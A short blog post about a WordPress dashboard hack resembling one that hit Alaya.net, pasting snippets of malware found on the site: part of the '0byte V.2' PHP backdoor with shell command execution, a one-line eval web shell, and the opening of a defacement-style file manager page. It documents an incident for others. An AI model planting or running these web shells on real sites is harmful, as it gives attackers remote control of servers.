Alaya·Techne

More info on the attack that hit Alaya.net

by

techne
in

This article has some info about an attack that is similar to what hit Alaya.net:

getastra.com: How to fix WordPress admin dashboard (wp-admin) hack

Here are some snippets from malicious code that was found. Note: to make the code easy to view click on the line-wrap icon for each info bar below.

<?php /* 0byte V.2 PHP Backdoor - www.zerobyte.id */ set_time_limit(0); error_reporting(0); error_log(0); function exect($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $exect = @ob_get_contents(); @ob_end_clean(); return $exect; } elseif(function_exists('exec')) { @exec($cmd,$results); $exect = ""; foreach($results as $result) { $exect .= $result; } return $exect; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $exect = @ob_get_contents(); @ob_end_clean(); return $exect; } elseif(function_exists('shell_exec')) { $exect = @shell_exec($cmd); return $exect; } } function fperms($filen) { $perms = fileperms($filen); $fpermsinfo .= (($perms & 0x0100) ? 'r' : '-'); $fpermsinfo .= (($perms & 0x0080) ? 'w' : '-'); $fpermsinfo .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $fpermsinfo .= (($perms & 0x0020) ? 'r' : '-'); $fpermsinfo .= (($perms & 0x0010) ? 'w' : '-'); $fpermsinfo .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $fpermsinfo .= (($perms & 0x0004) ? 'r' : '-'); $fpermsinfo .= (($perms & 0x0002) ? 'w' : '-'); $fpermsinfo .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); echo '<center><small>'.$fpermsinfo.'</small></center>'; } function eof() {echo "\x77\x77\x77\x2e\x7a\x65\x72\x6f\x62\x79\x74\x65\x2e\x69\x64";} ?> <title>0byteV2 - PHP Backdoor</title>
<?php @eval($_POST['moon']);?>
<?php
set_time_limit(0);
error_reporting(0);

if(get_magic_quotes_gpc()){
    foreach($_POST as $key=>$value){
        $_POST[$key] = stripslashes($value);
    }
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>B Ge Team File Manager</title>

<br><br><br> <center> <a rel='dofollow' href='https://www.google.co.id/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=indonesian+Hacker+rulez'> <img src='https://scontent-sin1-1.xx.fbcdn.net/hphotos-xal1/v/t1.0-9/12376796_565593456950242_7474357900886665426_n.jpg?oh=1db7c5d4e3fa5b7bc7b422a648b5decb&oe=574CE85B' style='opacity:0.4;filter:alpha(opacity=40)' onmouseover='this.style.opacity=1;this.filters.alpha.opacity=100' onmouseout='this.style.opacity=0.4;this.filters.alpha.opacity=40' height='360' width='670'><br></a> </center>
<br> <center> <font face='iceland' size='10' color='red'> -=[ TEMAN ??? YAKIN LU TEMEN GUA ??? ]=-</font> </center>
<br> <center> <font face='iceland' size='10' color='silver'> #Save Promagh</font> </center>
</center>
<b><font color='blue' face='consolas' size='4'>
<p align='center' class='style2'><font face='Trajan Pro' size='4' color='Green' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='yellow'> 
-=[[ MY FAMILY ]]=-<br>-| ./KEFIEX404 | MANIAK KASUR | MR.K | EL-RO | ./COCO | TUAN GALAU | DEDEMIT ID | NO SCRIPT 404 |- <br> -| K3C0T | SIM0D | LITLE H4XORZ | Antonio HsH |-</font><p>
<center><table width='100%' border='2'><tr><td width='10%' align='center'><blink><font Class-'glow' color='white'><code>MY FRIENDS : </code></font></blink></td><td width='90%'><font color='yellow' size='4'><marquee><code>
[.] X-Wu7z [.] Tuan_galau [.] GrenXPaRTa [.] x'1n73ct [.] m@db100d [.] Hacker Sakit Hati [.] ./$amndan404 [.] ./wi.na [.] Neneng Juhairiah[ .] Mr_Oxygen [.] ./coco [.] H3ri.ID [.] Ice Cream [.] newbie patah hati [.] Naughty_r00tz [.] DarkWireless [.] ./czw_07 [.] ./TanpaNama404 [.] xCut10n [.] Kucing Galau [.] ./anjirGBX [.] Dicky Injector [.] jepry_vuln [.] Shut_Down404 [.] Mr.404_NotFound [.] Mr.LittleHaxor [.] Mr.Ghostteror_404 [.] Mr.Dork [.] Mr.aji.192 [.] L4W_CyberDKSH404.Not_Found [.] ozlok [.] Bloc_Anon/404 [.] R3DD3V1L [.] mr.cookie_302 [.]</code></marquee></font></td></tr></table><html><center>

Searching for some of the names that appear in this last file I found this page:
http://hackcorporation.com/

Comments

Leave a Reply